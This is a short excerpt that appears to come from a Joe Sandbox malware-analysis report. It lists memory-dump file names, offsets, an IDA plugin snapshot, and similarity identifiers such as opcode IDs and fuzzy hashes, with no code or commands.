• Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
• Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
Similarity
• API ID: ByteCharMultiWide$ErrorLast
• String ID:
• API String ID: 1717984340-0
• Opcode ID: b71f4a7a3283075c7864527de69d67fd00094e01781f01a2d23bd228f84498ee
• Instruction ID: 7c79dc1556af896bdb1abee8e3d42f31adc56c298d87d9856de7ce93ac8e23a9
• Opcode Fuzzy Hash: b71f4a7a3283075c7864527de69d67fd00094e01781f01a2d23bd228f84498ee
• Instruction Fuzzy Hash: 3341B731600256EFCB21AFE5C8C4BAE7BA5EF45324F158169F869AB1E1DB308E01D774